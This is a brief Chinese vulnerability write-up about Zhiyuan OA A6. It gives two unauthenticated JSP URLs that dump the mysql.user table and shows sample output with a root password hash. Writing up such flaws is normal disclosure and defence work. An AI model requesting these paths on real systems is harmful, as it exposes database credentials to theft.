# 致远OA A6 敏感信息泄露(一)
### 一、漏洞简介
该漏洞泄露了数据库用户的账号,密码hash。访问该文件直接执行了Select * from mysql.user;并回显
### 二、漏洞影响
致远OA A6
### 三、复现过程
漏洞位置:
“`bash
http://url/yyoa/createMysql.jsp
http://url/yyoa/ext/createMysql.jsp
“`
回显内容:
“`bash
root
*1532B21FE550E115F113DAA9A26D0EEEEF8DEDC7
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容